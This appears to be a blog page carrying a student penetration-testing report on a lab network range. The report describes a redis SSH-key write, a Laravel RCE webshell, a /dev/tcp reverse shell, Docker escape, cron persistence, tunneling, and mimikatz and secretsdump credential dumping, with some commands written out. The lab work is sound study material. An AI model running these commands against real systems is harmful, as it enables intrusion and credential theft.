<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>Hexo</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Hexo"><meta name="msapplication-TileImage" content="https://cdn.jsdelivr.net/gh/removeif/removeif-demo@latest/img/favicon.png"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Hexo"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="​			 ​									自动化网络渗透测试 ​										项目实施报告 ​							题目： 综合网络靶场渗透测试    ​							学院： 计算机与人工智能学院（软件学院） ​							专业：     网络空间安全       ​							班级：      2023级 5  班      ​							姓名：    唐旭、谭卓元         ​							时间"><meta property="og:type" content="blog"><meta property="og:title" content="辣椒の酱"><meta property="og:url" content="https://removeif.github.io/"><meta property="og:site_name" content="辣椒の酱"><meta property="og:description" content="​			 ​									自动化网络渗透测试 ​										项目实施报告 ​							题目： 综合网络靶场渗透测试    ​							学院： 计算机与人工智能学院（软件学院） ​							专业：     网络空间安全       ​							班级：      2023级 5  班      ​							姓名：    唐旭、谭卓元         ​							时间"><meta property="og:locale" content="en_US"><meta property="og:image" content="https://cdn.jsdelivr.net/gh/removeif/removeif-demo@latest/img/avatar.png"><meta property="article:published_time" content="2026-03-31T03:41:56.808Z"><meta property="article:modified_time" content="2026-01-20T04:22:53.902Z"><meta property="article:author" content="removeif"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://cdn.jsdelivr.net/gh/removeif/removeif-demo@latest/img/avatar.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://example.com/2026/03/31/%E7%BA%A2%E6%97%A5/"},"headline":"Hexo","image":["file:///C:/Users/唐旭/AppData/Local/Temp/ksohtml40936/wps9.png","file:///C:/Users/唐旭/AppData/Local/Temp/ksohtml40936/wps10.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251206092221259.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251206092249562.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251206093049687.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251206093301835.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251206093740771.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251206093939490.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251206094434249.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251206094602700.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251206095527601.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251206095537662.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251206100338067.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251207143447489.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251207143657395.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251207144300124.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251230103806665.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251230103919842.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251230103935489.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251230110122831.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251230105904910.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251230110332427.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251230110413460.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251230111135521.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251230234104825.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251230234136970.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251230234332913.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20251230234425584.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120083413255.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120083907629.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120083930339.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120084620384.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120084246076.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120084600499.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120085128905.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120085311924.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120085514694.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120095320123.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120120632536.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120120757356.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120120900734.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120120908519.png","file:///C:/Users/唐旭/AppData/Local/Temp/ksohtml40936/wps1.jpg","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120120955383.png","file:///C:/Users/唐旭/AppData/Local/Temp/ksohtml40936/wps3.jpg","file:///C:/Users/唐旭/AppData/Local/Temp/ksohtml40936/wps4.jpg","file:///C:/Users/唐旭/AppData/Local/Temp/ksohtml40936/wps5.jpg","file:///C:/Users/唐旭/AppData/Local/Temp/ksohtml40936/wps6.jpg","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120121046649.png","c:/Users/唐旭/AppData/Roaming/Typora/typora-user-images/image-20260120121107800.png"],"datePublished":"2026-03-31T03:41:56.808Z","dateModified":"2026-01-20T04:22:53.902Z","author":{"@type":"Person","name":"John Doe"},"publisher":{"@type":"Organization","logo":{"@type":"ImageObject"}},"description":"​\t\t\t ​\t\t\t\t\t\t\t\t\t自动化网络渗透测试 ​\t\t\t\t\t\t\t\t\t\t项目实施报告 ​\t\t\t\t\t\t\t题目： 综合网络靶场渗透测试    ​\t\t\t\t\t\t\t学院： 计算机与人工智能学院（软件学院） ​\t\t\t\t\t\t\t专业：     网络空间安全       ​\t\t\t\t\t\t\t班级：      2023级 5  班      ​\t\t\t\t\t\t\t姓名：    唐旭、谭卓元         ​\t\t\t\t\t\t\t时间"}</script><link rel="canonical" href="http://example.com/2026/03/31/%E7%BA%A2%E6%97%A5/"><link rel="icon" href="https://cdn.jsdelivr.net/gh/removeif/removeif-demo@latest/img/favicon.png"><meta name="referrer" content="no-referrer-when-downgrade"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/6.0.0/css/all.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/11.7.0/styles/atom-one-light.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro|Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&amp;amp;subset=latin,latin-ext|Inconsolata|Itim|Lobster.css"><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="/js/globalUtils.js"></script><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.10.0/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.8.1/css/justifiedGallery.min.css"><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdnjs.loli.net/ajax/libs/pace/1.2.4/pace.min.js"></script><link rel="stylesheet" href="/live2d/waifu.css"><script type="text/javascript" async src="/live2d/autoload.js"></script><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body class="is-3-column has-navbar-fixed-top"><nav class="navbar navbar-main is-fixed-top"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="https://cdn.jsdelivr.net/gh/removeif/removeif-demo@latest/img/logo.png" alt="Hexo" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a><a class="navbar-item" href="/album">Album</a><a class="navbar-item" href="/friend">Friend</a><a class="navbar-item" href="/message">Message</a><a class="navbar-item" href="/self-talking">Self-talking</a><a class="navbar-item" href="/music">Music</a><a class="navbar-item" href="/media">Media</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Join Gitter" href="https://gitter.im/hexo-theme-amazing/community"><i class="fab fa-gitter"></i></a><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/removeif/hexo-theme-amazing"><i class="fab fa-github"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item" id="night-nav" title="Night Mode" href="javascript:;"><i class="fas fa-moon" id="night-icon"></i></a></div></div></div></nav><script type="text/javascript" src="/js/theme-setting.js"></script><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><!--!--><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><i class="far fa-calendar-plus"> </i>2026-03-31  <a class="commentCountImg" href="/2026/03/31/%E7%BA%A2%E6%97%A5/#comment-container"><span class="display-none-class">d41d8cd98f00b204e9800998ecf8427e</span><i class="far fa-comment-dots"></i> <span class="commentCount" id="d41d8cd98f00b204e9800998ecf8427e">99+</span>  </a><span class="level-item"><i class="far fa-clock"> </i>13 m  <i class="fas fa-pencil-alt"> </i>2.0 k</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>&nbsp;visits</span></div></div><h1 class="title is-3 is-size-4-mobile"> </h1><div class="content"><p>​			<img src="file:///C:\Users\唐旭\AppData\Local\Temp\ksohtml40936\wps9.png" alt="img"><img src="file:///C:\Users\唐旭\AppData\Local\Temp\ksohtml40936\wps10.png" alt="img"></p>
<p>​									自动化网络渗透测试</p>
<p>​										项目实施报告</p>
<p>​							题目： 综合网络靶场渗透测试   </p>
<p>​							学院： 计算机与人工智能学院（软件学院）</p>
<p>​							专业：     网络空间安全      </p>
<p>​							班级：      2023级 5  班     </p>
<p>​							姓名：    唐旭、谭卓元        </p>
<p>​							时间：     2026年1月6日    </p>
<p>信息收集<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251206092221259.png" alt="image-20251206092221259"></p>
<p>端口扫描<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251206092249562.png" alt="image-20251206092249562"><br>用fscan 漏扫发现redis未授权跟CVE漏洞，一个个尝试</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251206093049687.png" alt="image-20251206093049687"></p>
<p>kali利用redis-cli工具连接<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251206093301835.png" alt="image-20251206093301835"></p>
<p>有了未授权，我们直接往目标主机写入ssh公钥,将公钥导入key.txt文件(前后用\n换行，避免和Redis里其他缓存数据混合)，再把key.txt文件内容写入目标主机的redis缓冲里.<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251206093740771.png" alt="image-20251206093740771"></p>
<p>然后使用攻击机连接目标机器Redis，分别执行如下命令将ssh公钥写入目标主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">config set dir /root/.ssh    # 设置redis的备份路径为/root/.ssh/</span><br><span class="line">config set dbfilename authorized_keys    # 设置保存文件名为authorized_keys</span><br><span class="line">save    # 将数据保存在目标服务器硬盘上</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251206093939490.png" alt="image-20251206093939490"></p>
<p>接着我们开始测试连接目标靶机ssh<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251206094434249.png" alt="image-20251206094434249"></p>
<p>连接成功。<br>当查看ip时发现还有一层内网。<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251206094602700.png" alt="image-20251206094602700"></p>
<p>给靶机传输fscan来对192.168.52.10的网段进行信息收集。<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251206095527601.png" alt="image-20251206095527601"></p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251206095537662.png" alt="image-20251206095537662"></p>
<p>给权限之后开始扫描，成功发现一个ip192.168.52.20</p>
<p>接下来我们对81端口进行访问192.168.150.138:81<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251206100338067.png" alt="image-20251206100338067"></p>
<p>发现是个Laravel的站点，这个版本为Laravel v8.29.0 (PHP v7.4.14)，Laravel是一套简洁、开源的PHP Web开发框架，旨在实现Web软件的MVC架构</p>
<p>这个版本存在远程代码执行漏洞，我们可以通过exp打，也可以使用工具，直接生成shell进行连接</p>
<p>我们直接用cve漏洞打<img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251207143447489.png" alt="image-20251207143447489"></p>
<p>成功写入木马<br>蚁剑连接</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251207143657395.png" alt="image-20251207143657395"></p>
<p>成功连接以后发现是一个docker容器<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251207144300124.png" alt="image-20251207144300124"></p>
<p>想要逃逸docker需要一个稳定的shell,我们开始从蚁剑中反弹shell到web1主机上</p>
<p>将bash -c “bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.52.10&#x2F;8899 0&gt;&amp;1”写入1.sh，web1开启监听，蚁剑bash 1.sh就可以反弹shell了。</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251230103806665.png" alt="image-20251230103806665"></p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251230103919842.png" alt="image-20251230103919842"></p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251230103935489.png" alt="image-20251230103935489"></p>
<p>此时我们拿到的权限仅仅只是www-data，这个用户权限较低，需要提权到root权限</p>
<p>我们先稳定shell到kali里面，利用环境变量劫持提权，先写入一个bash文件如下，在给权限</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251230110122831.png" alt="image-20251230110122831"></p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251230105904910.png" alt="image-20251230105904910"></p>
<p>将tmp放在最前面然后再重kali开启一个新的终端，ssh连接web1，开启监听用8889端口，最后执行一下&#x2F;home&#x2F;jobs&#x2F;shell文件就可以提权到root权限</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251230110332427.png" alt="image-20251230110332427"></p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251230110413460.png" alt="image-20251230110413460"></p>
<p>但现在还是docker里面的root权限现在要逃逸docker，需要将web2的文件内容挂载到docker里面，就相当于逃离了docker，即使还在docker，但是能执行web2的文件。</p>
<p>我们先在docker中新建一个 &#x2F;hack 目录用来挂载文件系统： mkdir &#x2F;hack ,再挂载到宿主机第一块硬盘</p>
<p>mount &#x2F;dev&#x2F;sda1 &#x2F;hack<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251230111135521.png" alt="image-20251230111135521"></p>
<p>hack文件夹里有东西了，挂载成功<br>接下来就是内网渗透使用工具stowaway搭建隧道。</p>
<p>用http服务上传stowaway压缩包到web1<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251230234104825.png" alt="image-20251230234104825"></p>
<p>然后卡里开启监听（.&#x2F;admin  -l  9999  -s  hack ），web1连接就好了<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251230234136970.png" alt="image-20251230234136970"></p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251230234332913.png" alt="image-20251230234332913"></p>
<p>连接web1成功。</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20251230234425584.png" alt="image-20251230234425584"></p>
<p>web1运行agent连接上kaili监听的9999端口后，提示上线成功，对应节点0（node 0）在node 0节点模式使用命令 socks 1080 打开代理端口，kali上数据往1080端口发的，都会被代理到web1的</p>
<p>192.168.150.138主机上<img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120083413255.png" alt="image-20260120083413255"></p>
<p>再给firefox设置代理就可访问web2的服务了<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120083907629.png" alt="image-20260120083907629"><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120083930339.png" alt="image-20260120083930339"></p>
<p>但是curl没反应，这时候我们要修改proxychains配置文件，添加最后一句话就好了。<br><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120084620384.png" alt="image-20260120084620384"></p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120084246076.png" alt="image-20260120084246076"></p>
<p>成功响应。</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120084600499.png" alt="image-20260120084600499"></p>
<p>接下来就是将web2的代理也用搭建连接将agent传到web2中的hack&#x2F;tmp挂载中。</p>
<p>先上传到www-data用户上在复制到挂载中在赋予权限。</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120085128905.png" alt="image-20260120085128905"></p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120085311924.png" alt="image-20260120085311924"></p>
<p>再添加定时任务（echo ‘* * * * * &#x2F;agent -c 192.168.52.10:8881 -s hack &amp;’ &gt; &#x2F;hack&#x2F;var&#x2F;spool&#x2F;cron&#x2F;crontabs&#x2F;root）（cat &#x2F;hack&#x2F;var&#x2F;spool&#x2F;cron&#x2F;crontabs&#x2F;root）</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120085514694.png" alt="image-20260120085514694"></p>
<p>上线成功拿到web2的shell，再将端口转发到kali上 </p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120095320123.png" alt="image-20260120095320123"></p>
<p>发现存在192.168.52.30：8888主机服务，firefox设置代理访问</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120120632536.png" alt="image-20260120120632536"></p>
<p>看到标题为通达OA，联想到通达OA漏洞</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120120757356.png" alt="image-20260120120757356"></p>
<p>Kali的jDK版本切换为jdk1.8.0，然后运行通达OA渗透工具，在工具内设置代理后（socks:&#x2F;&#x2F;127.0.0.1:1080)进行文件上传</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120120900734.png" alt="image-20260120120900734"></p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120120908519.png" alt="image-20260120120908519"></p>
<p>再打开一个蚁剑，因为要加代理</p>
<p><img src="file:///C:\Users\唐旭\AppData\Local\Temp\ksohtml40936\wps1.jpg" alt="img"> </p>
<p>复制文件上传成功后的那个地址，添加地址，测试连接可以成功。</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120120955383.png" alt="image-20260120120955383"></p>
<p>得到目标windows主机（PC1）的 SYSTEM权限，然后上线PC1</p>
<p><img src="file:///C:\Users\唐旭\AppData\Local\Temp\ksohtml40936\wps3.jpg" alt="img"> </p>
<p>利用WINPEAS工具进行信息收集下载 win_info.txt 到kali进行分析。其中发现提示可以导出明文密码。</p>
<p><img src="file:///C:\Users\唐旭\AppData\Local\Temp\ksohtml40936\wps4.jpg" alt="img"> </p>
<p>从工具包mimikatz_trunk.zip中找到64位的mimikatz.exe </p>
<p>上传，执行下列指令获取明文密码</p>
<p>mimikatz.exe”logres.txt””privilege::debug””sekurlsa::logonpasswords””exit”，执行完会在当前目录生成res.txt文件，蚁剑中双击打开这个文件。里面能看到密码Bunny2021。</p>
<p><img src="file:///C:\Users\唐旭\AppData\Local\Temp\ksohtml40936\wps5.jpg" alt="img"> </p>
<p>利用fscan工具对93网段进行信息收集</p>
<p><img src="file:///C:\Users\唐旭\AppData\Local\Temp\ksohtml40936\wps6.jpg" alt="img"> </p>
<p>上线节点3</p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120121046649.png" alt="image-20260120121046649"></p>
<p>在PC1的shell中上传执行工具包中的secretsdump.exe，能从域控中获取所有用户的用户密码hash值</p>
<p>secretsdump.exewhoamianony.org&#x2F;administrator:<a href="mailto:&#x57;&#104;&#x6f;&#97;&#109;&#x69;&#50;&#x30;&#50;&#49;&#x40;&#49;&#57;&#x32;&#x2e;&#49;&#x36;&#56;&#x2e;&#57;&#51;&#46;&#x33;&#48;&#45;&#106;&#117;&#115;&#116;&#x2d;&#100;&#99;">Whoami2021@192.168.93.30-just-dc</a></p>
<p><img src="C:\Users\唐旭\AppData\Roaming\Typora\typora-user-images\image-20260120121107800.png" alt="image-20260120121107800"></p>
</div><div class="article-licensing box"><div class="licensing-title"><p><a href="http://example.com/2026/03/31/红日/">http://example.com/2026/03/31/红日/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>Author</h6><a href="http://example.com"><p>John Doe</p></a></div></div><div class="level-item is-narrow"><div><h6>Posted on</h6><p>2026-03-31</p></div></div><div class="level-item is-narrow"><div><h6>Updated on</h6><p>2026-01-20</p></div></div><div class="level-item is-narrow"><div><h6>Licensed under</h6><p><a class="icon" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a><a class="icon" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a><a class="icon" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="recommend-area"><div class="recommend-post"><span class="is-size-6 has-text-grey has-mr-7"># Related Post</span><br><span>  1.<a class="is-size-6" href="/2026/03/31/Victim01_042220/" target="_blank"> </a><br></span><span>  2.<a class="is-size-6" href="/2026/03/31/Untitled/" target="_blank"> </a><br></span><span>  3.<a class="is-size-6" href="/2026/03/31/p4l4nc4/" target="_blank"> </a><br></span><span>  4.<a class="is-size-6" href="/2026/03/31/opacity/" target="_blank"> </a><br></span><span>  5.<a class="is-size-6" href="/2026/03/31/Me-and-My-Girlfriend-1/" target="_blank"> </a><br></span><span>  6.<a class="is-size-6" href="/2026/03/31/Lampiao/" target="_blank"> </a><br></span><span>  7.<a class="is-size-6" href="/2026/03/31/hackable2/" target="_blank"> </a><br></span></div></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/css/share.min.css"><div class="social-share"></div><script src="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">Like this article? Support the author with</h3><div class="buttons is-centered"><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>Alipay</span><span class="qrcode"><img src="https://raw.githubusercontent.com/removeif/blog_image/master/img/2019/20190802135456.png" alt="Alipay"></span></a><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>Wechat</span><span class="qrcode"><img src="https://raw.githubusercontent.com/removeif/blog_image/master/img/2019/20190802135550.png" alt="Wechat"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2026/03/31/Victim01_042220/"><span class="level-item"> </span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--><div class="card"><div class="card-content"><div class="title is-5">Comments</div><div id="comment-container"></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/gitalk/1.6.0/gitalk.css"><script> $.getScript('/js/gitalk.min.js', function () { 
            var gitalk = new Gitalk({
            language:'zh-CN',
            id: 'd41d8cd98f00b204e9800998ecf8427e',
            repo: 'blog_comment',
            owner: 'removeif',
            clientID: '46a9f3481b46ea0129d8',
            clientSecret: '79c7c9cb847e141757d7864453bcbf89f0655b24',
            admin: ["removeif"],
            createIssueManually: true,
            distractionFreeMode: false,
            perPage: 10,
            pagerDirection: 'last',
            proxy: 'https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token',
            
            enableHotKey: true,
            isLocked: false
        })
        gitalk.render('comment-container')});</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1 is-sticky"><!--!--><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="https://cdn.jsdelivr.net/gh/removeif/removeif-demo@latest/img/avatar.png" alt="辣椒の酱"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">辣椒の酱</p><p class="is-size-6 is-block">尚未执佩剑，转眼即江湖</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>阿尔及利亚</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives/"><p class="title">8</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories/"><p class="title">0</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags/"><p class="title">0</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/ppoffice" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/removeif"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Weibo" href="https://weibo.com/removeif"><i class="fab fa-weibo"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Email" href="mailto:removeif@163.com"><i class="fa fa-envelope"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Next" href="https://removeif.github.io/remove.io"><i class="fab fa-dribbble"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div><div><hr><p id="hitokoto">:D 一言句子获取中...</p><script type="text/javascript" defer>function getYiyan(){
                                $.getJSON("https://v1.hitokoto.cn/", function (data) {
                                if(data){
                                    $('#hitokoto').html("");
                                    $('#hitokoto').append("<strong style='color: #3273dc;'>"+data.hitokoto+"</strong>"+
                                    "<p>"+"From《"+data.from+"》</p><p>Provider-"+data.creator+"</p>");
                                }});}
